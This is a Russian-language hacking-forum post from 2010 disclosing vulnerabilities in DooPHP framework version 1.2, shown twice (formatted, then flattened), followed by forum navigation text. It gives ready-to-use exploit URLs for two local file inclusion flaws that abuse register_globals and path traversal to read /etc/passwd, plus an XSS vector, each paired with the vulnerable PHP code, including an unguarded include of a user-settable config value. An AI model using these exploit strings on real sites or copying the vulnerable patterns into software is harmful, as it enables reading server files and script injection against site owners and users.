DooPHP framework

oRb · 04.07.2010, 12:11

Сайт: http://www.doophp.com/
Версия: 1.2
Дата: 26.09.2009

LFI
Зависимости:

register_globals = On
magic_quotes_pgc = Off

Exploit: index.php/xek/?route[*][%2Fxek][]=../../../../../../../../etc/passwd%00&route[*][%2Fxek][]=index
Файл: ./protected/config/routes.conf.php

PHP код:


			
<?php

/**

 * Define your URI routes here.

 *

 * $route[Request Method][Uri] = array( Controller class, action method, other options, etc. )

 *

 * RESTful api support, *=any request method, GET PUT POST DELETE

 * POST     Create

 * GET      Read

 * PUT      Update, Create

 * DELETE     Delete

 *

 * Use lowercase for Request Method

 *

 * If you have your controller file name different from its class name, eg. home.php HomeController

 * $route['*']['/'] = array('HomeController', 'index', 'className'=>'HomeController');

 * 

 * If you need to reverse generate URL based on route ID with DooUrlBuilder in template view, please defined the id along with the routes

 * $route['*']['/'] = array('HomeController', 'index', 'id'=>'home');

 */

$admin = array('admin'=>'1234');

 

$route['*']['/'] = array('MainController', 'index');

...

LFI
Зависимости:

register_globals = On
Неинициализированный индекс $config['ERROR_404_DOCUMENT'] (по дефолту строка закомментированна)

Exploit: index.php/xek/?config[ERROR_404_DOCUMENT]=../../../../../../etc/passwd
Файл: dooframework/app/DooWebApp.php

PHP код:


			
...

if($code===404){

                    //Controller return 404, send 404 header, include file if ERROR_404_DOCUMENT is set by user

                    header('HTTP/1.1 404 Not Found');

                    if(!empty(Doo::conf()->ERROR_404_DOCUMENT)){

                        include Doo::conf()->SITE_PATH . Doo::conf()->ERROR_404_DOCUMENT;

                    }

                    //execute route to handler 404 display if ERROR_404_ROUTE is defined, the route handler shouldn't send any headers or return 404

                    elseif(!empty(Doo::conf()->ERROR_404_ROUTE)){

                        $this->reroute(Doo::conf()->ERROR_404_ROUTE, true);

                    }

                    exit;

                }

...

XSS
Зависимости: register_globals = On
Exploit: /protected/viewc/good.php?data[asd]=[xss payload]
Файл: protected/viewc/good.php

PHP код:


			
<?php



echo $data['asd'];

echo $this->gogo;

$this->inc('abc');

?>

04.07.2010, 12:11	#1
oRb Регистрация: 01.07.2010 Сообщений: 319 Репутация: 138	DooPHP framework Сайт: http://www.doophp.com/ Версия: 1.2 Дата: 26.09.2009 LFI Зависимости: register_globals = On magic_quotes_pgc = Off Exploit: index.php/xek/?route[][%2Fxek][]=../../../../../../../../etc/passwd%00&route[][%2Fxek][]=index Файл: ./protected/config/routes.conf.php PHP код: <?php /** * Define your URI routes here. * * $route[Request Method][Uri] = array( Controller class, action method, other options, etc. ) * * RESTful api support, =any request method, GET PUT POST DELETE POST Create * GET Read * PUT Update, Create * DELETE Delete * * Use lowercase for Request Method * * If you have your controller file name different from its class name, eg. home.php HomeController * $route['']['/'] = array('HomeController', 'index', 'className'=>'HomeController'); * If you need to reverse generate URL based on route ID with DooUrlBuilder in template view, please defined the id along with the routes * $route['']['/'] = array('HomeController', 'index', 'id'=>'home'); / $admin = array('admin'=>'1234'); $route['']['/'] = array('MainController', 'index'); ... LFI* Зависимости: register_globals = On Неинициализированный индекс $config['ERROR_404_DOCUMENT'] (по дефолту строка закомментированна) Exploit: index.php/xek/?config[ERROR_404_DOCUMENT]=../../../../../../etc/passwd Файл: dooframework/app/DooWebApp.php PHP код: ... if($code===404){ //Controller return 404, send 404 header, include file if ERROR_404_DOCUMENT is set by user header('HTTP/1.1 404 Not Found'); if(!empty(Doo::conf()->ERROR_404_DOCUMENT)){ include Doo::conf()->SITE_PATH . Doo::conf()->ERROR_404_DOCUMENT; } //execute route to handler 404 display if ERROR_404_ROUTE is defined, the route handler shouldn't send any headers or return 404 elseif(!empty(Doo::conf()->ERROR_404_ROUTE)){ $this->reroute(Doo::conf()->ERROR_404_ROUTE, true); } exit; } ... XSS Зависимости: register_globals = On Exploit: /protected/viewc/good.php?data[asd]=[xss payload] Файл: protected/viewc/good.php PHP код: `<?php echo $data['asd']; echo $this->gogo; $this->inc('abc'); ?>` __________________ Не оказываю никаких услуг. I don't provide any services.

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид